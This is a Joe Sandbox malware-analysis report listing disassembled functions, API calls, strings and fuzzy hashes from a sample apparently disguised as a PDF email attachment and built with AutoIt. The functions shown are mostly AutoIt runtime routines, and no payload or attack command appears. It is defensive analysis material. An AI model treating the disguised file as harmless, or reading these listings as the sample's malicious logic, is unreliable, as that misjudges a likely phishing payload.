                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                          • API String ID: 1458621304-248962490
                                                                                                          • Opcode ID: 908ac30c682fd4b0421989b08f15361c4df830dbcc3a23b5143582f2c8f1dda2
                                                                                                          • Instruction ID: efb37c3c1d24349494ec307732b8cf7422edfe26dd634f8d42f3ae6e8e58512c
                                                                                                          • Opcode Fuzzy Hash: 908ac30c682fd4b0421989b08f15361c4df830dbcc3a23b5143582f2c8f1dda2
                                                                                                          • Instruction Fuzzy Hash: 43B17F71A00209DFDB15DFA8DC89BEE7BB4FB48311F108129FE16A6290DB78A855CB54
                                                                                                          Function 007AA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 007AA47A
                                                                                                          • __swprintf.LIBCMT ref: 007AA51B
                                                                                                          • _wcscmp.LIBCMT ref: 007AA52E
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AA583
                                                                                                          • _wcscmp.LIBCMT ref: 007AA5BF
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 007AA5F6
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007AA648
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007AA67E
                                                                                                          • GetParent.USER32(?), ref: 007AA69C
                                                                                                          • ScreenToClient.USER32(00000000), ref: 007AA6A3
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 007AA71D
                                                                                                          • _wcscmp.LIBCMT ref: 007AA731
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 007AA757
                                                                                                          • _wcscmp.LIBCMT ref: 007AA76B
                                                                                                            • Part of subcall function 0077362C: _iswctype.LIBCMT ref: 00773634
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 3744389584-679674701
                                                                                                          • Opcode ID: 36d6a7816ac077c9f4e333e85dac1e7ff3799e8cd08eac606924142a12459866
                                                                                                          • Instruction ID: ac6816394cc1750a0966771fbb98ee283ef7386861c0d59a7f9952e1765b9ec7
                                                                                                          • Opcode Fuzzy Hash: 36d6a7816ac077c9f4e333e85dac1e7ff3799e8cd08eac606924142a12459866
                                                                                                          • Instruction Fuzzy Hash: 26A1B171204206FBDB15DF64C888BAAB7E8FF85354F108629F999C2190DB38E955CB92
                                                                                                          Function 007AAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 007AAF18
                                                                                                          • _wcscmp.LIBCMT ref: 007AAF29
                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AAF51
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 007AAF6E
                                                                                                          • _wcscmp.LIBCMT ref: 007AAF8C
                                                                                                          • _wcsstr.LIBCMT ref: 007AAF9D
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 007AAFD5
                                                                                                          • _wcscmp.LIBCMT ref: 007AAFE5
                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB00C
                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB055
                                                                                                          • _wcscmp.LIBCMT ref: 007AB065
                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 007AB08D
                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 007AB0F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                          • String ID: @$ThumbnailClass
                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                          • Opcode ID: 54fae5b72c686a33d558aee415333263dfeb9eec1d9598abca68649c749443ef
                                                                                                          • Instruction ID: 4cceea483f892e858d1b5ad32c9c1b5d66dbbf95ce7acefc7bf68525eebd4134
                                                                                                          • Opcode Fuzzy Hash: 54fae5b72c686a33d558aee415333263dfeb9eec1d9598abca68649c749443ef
                                                                                                          • Instruction Fuzzy Hash: 2D819171108309EFDB05DF14C885FAA77E8EF85354F14866AFD898A092DB38DD49CB61
                                                                                                          Function 007AABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                          • Opcode ID: bfa6c9845f90eedc3574bd113c38d7d4f6599e09069f3181a1b3dec67939d906
                                                                                                          • Instruction ID: 26156b0cac84883a7abff045781e68d22845c6561733609c8e9986101e0ce723
                                                                                                          • Opcode Fuzzy Hash: bfa6c9845f90eedc3574bd113c38d7d4f6599e09069f3181a1b3dec67939d906
                                                                                                          • Instruction Fuzzy Hash: C931D270A48205FBEA54EA50DD0BEEE7368EF10761F200128F816B11D1EF9D6F08D662
                                                                                                          Function 007C4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 007C5013
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007C501E
                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 007C5029
                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 007C5034
                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 007C503F
                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 007C504A
                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 007C5055
                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 007C5060
                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 007C506B
                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 007C5076
                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 007C5081
                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 007C508C
                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 007C5097
                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 007C50A2
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 007C50AD
                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 007C50B8
                                                                                                          • GetCursorInfo.USER32(?), ref: 007C50C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load$Info
                                                                                                          • String ID:
                                                                                                          • API String ID: 2577412497-0
                                                                                                          • Opcode ID: d86f26a7dd7eaddadb97d0871dc204a22720785b17dc61ee9968a875e65f68ab
                                                                                                          • Instruction ID: ad0d0c62855d954d35941d20346e6db6f531298af142e8c6af294c3afc5e42d6
                                                                                                          • Opcode Fuzzy Hash: d86f26a7dd7eaddadb97d0871dc204a22720785b17dc61ee9968a875e65f68ab
                                                                                                          • Instruction Fuzzy Hash: 7231E1B1D4831DAADF109FB68C89DAFBFE8FB04750F50452AA50DE7280DA79A5408E91
                                                                                                          Function 007DA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007DA259
                                                                                                          • DestroyWindow.USER32(?,?), ref: 007DA2D3
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA34D
                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA36F
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA382
                                                                                                          • DestroyWindow.USER32(00000000), ref: 007DA3A4
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA3DB
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA3F4
                                                                                                          • GetDesktopWindow.USER32 ref: 007DA40D
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007DA414
                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA42C
                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA444
                                                                                                            • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                          • String ID: 0$tooltips_class32
                                                                                                          • API String ID: 1297703922-3619404913
                                                                                                          • Opcode ID: d8ffc27c035aa2c2cce6498f0ea4e4b5599015b93adf8378a88fec750a8440e0
                                                                                                          • Instruction ID: 6179f3aef6b7ae3b0fc2b7529a098f913c184928a1fae5b989e26c91d5f3aeb0
                                                                                                          • Opcode Fuzzy Hash: d8ffc27c035aa2c2cce6498f0ea4e4b5599015b93adf8378a88fec750a8440e0
                                                                                                          • Instruction Fuzzy Hash: F3716B70140245AFD725CF28CC49FA677FAFB88300F04852EF985872A1DBB8E906CB56
                                                                                                          Function 007DC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 007DC627
                                                                                                            • Part of subcall function 007DAB37: ClientToScreen.USER32(?,?), ref: 007DAB60
                                                                                                            • Part of subcall function 007DAB37: GetWindowRect.USER32(?,?), ref: 007DABD6
                                                                                                            • Part of subcall function 007DAB37: PtInRect.USER32(?,?,007DC014), ref: 007DABE6
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007DC690
                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC69B
                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC6BE
                                                                                                          • _wcscat.LIBCMT ref: 007DC6EE
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC705
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007DC71E
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 007DC735
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 007DC757
                                                                                                          • DragFinish.SHELL32(?), ref: 007DC75E
                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DC851
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                          • API String ID: 169749273-3440237614
                                                                                                          • Opcode ID: fb6ea3d0e89512cd691b00b895be113703798454b1b51bc154560cb7c437fbb3
                                                                                                          • Instruction ID: 499463d24530f8442bd1811007d22aa4cd32f544a0f20f7c56ae75a38e9d64b4
                                                                                                          • Opcode Fuzzy Hash: fb6ea3d0e89512cd691b00b895be113703798454b1b51bc154560cb7c437fbb3
                                                                                                          • Instruction Fuzzy Hash: 24612A71508301EFC701DF64DC89D9BBBF8EF89710F00492EF595962A1DB78AA49CB52
                                                                                                          Function 007D4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007D4424
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D446F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                          • API String ID: 3974292440-4258414348
                                                                                                          • Opcode ID: 80a6dfdc91e3c315630d2c4d2523963c33cebe1daea44ade10e478d55d355e03
                                                                                                          • Instruction ID: 2747a6bfe125b8bb81f22283e2504478b03f647368605189121755c2115c4572
                                                                                                          • Opcode Fuzzy Hash: 80a6dfdc91e3c315630d2c4d2523963c33cebe1daea44ade10e478d55d355e03
                                                                                                          • Instruction Fuzzy Hash: 33918C71204701DFCB04EF20C856AAEB7E1AF95750F058869FD965B3A2CB78ED49CB81
                                                                                                          Function 007DB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DB8B4
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007D91C2), ref: 007DB910
                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DB949
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DB98C
                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DB9C3
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 007DB9CF
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DB9DF
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,007D91C2), ref: 007DB9EE
                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBA0B
                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBA17
                                                                                                            • Part of subcall function 00772EFD: __wcsicmp_l.LIBCMT ref: 00772F86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                          • API String ID: 1212759294-1154884017
                                                                                                          • Opcode ID: 692b427d8fd47e796776d04d70a0dc2b61043af9b71bb384605d4038f43f2862
                                                                                                          • Instruction ID: af4dc1a65f1f1a68d6023e80a3a51812f7082ccb00631797902ae52293314eeb
                                                                                                          • Opcode Fuzzy Hash: 692b427d8fd47e796776d04d70a0dc2b61043af9b71bb384605d4038f43f2862
                                                                                                          • Instruction Fuzzy Hash: 6961AF71900219FAEB14DF64CC45FBE7BB8FB08721F108516FA25D62D1DB78A981DBA0
                                                                                                          Function 007B9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007B9C7F
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007B9CA0
                                                                                                          • __swprintf.LIBCMT ref: 007B9CF9
                                                                                                          • __swprintf.LIBCMT ref: 007B9D12
                                                                                                          • _wprintf.LIBCMT ref: 007B9DB9
                                                                                                          • _wprintf.LIBCMT ref: 007B9DD7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 311963372-3080491070
                                                                                                          • Opcode ID: 7240a14402ab476b6dc6b3992d4e58ca73b656cfcf5f19ec1d7c64657b49d9fc
                                                                                                          • Instruction ID: 47fc80f9ee64865a8bd7ce33a0ac81010f5b8083d530782cfa2c3731f43c8444
                                                                                                          • Opcode Fuzzy Hash: 7240a14402ab476b6dc6b3992d4e58ca73b656cfcf5f19ec1d7c64657b49d9fc
                                                                                                          • Instruction Fuzzy Hash: A751A372900509EACF18EBE0DD4AEEEB778EF14301F504065F915B21A2EB792F59DB60
                                                                                                          Function 007BA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007BA3CB
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 007BA418
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA460
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA497
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA4C5
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 2698844021-4113822522
                                                                                                          • Opcode ID: 262145e3b52ba96f49ca7e4d33ac25571a5f03c59db0f2c2cb7238d51c094502
                                                                                                          • Instruction ID: c3e596414a2fdf0f86beb272bffe6eb08c57fa52a4c11c495a4ea8d1a5fdc86b
                                                                                                          • Opcode Fuzzy Hash: 262145e3b52ba96f49ca7e4d33ac25571a5f03c59db0f2c2cb7238d51c094502
                                                                                                          • Instruction Fuzzy Hash: 19517C71104305DFC704EF14C8959AAB7E8FF94718F00886DF89A972A1DB79ED09CB92
                                                                                                          Function 007AF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0078E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 007AF8DF
                                                                                                          • LoadStringW.USER32(00000000,?,0078E029,00000001), ref: 007AF8E8
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0078E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 007AF90A
                                                                                                          • LoadStringW.USER32(00000000,?,0078E029,00000001), ref: 007AF90D
                                                                                                          • __swprintf.LIBCMT ref: 007AF95D
                                                                                                          • __swprintf.LIBCMT ref: 007AF96E
                                                                                                          • _wprintf.LIBCMT ref: 007AFA17
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007AFA2E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 984253442-2268648507
                                                                                                          • Opcode ID: 8d58304d82d5eccb9d921c482769514bb5a988a3237a90b842c32221d38d8a97
                                                                                                          • Instruction ID: 500a53704eb8404ef1f86dd4396178c827fcebee73f312d51e705126466ceefc
                                                                                                          • Opcode Fuzzy Hash: 8d58304d82d5eccb9d921c482769514bb5a988a3237a90b842c32221d38d8a97
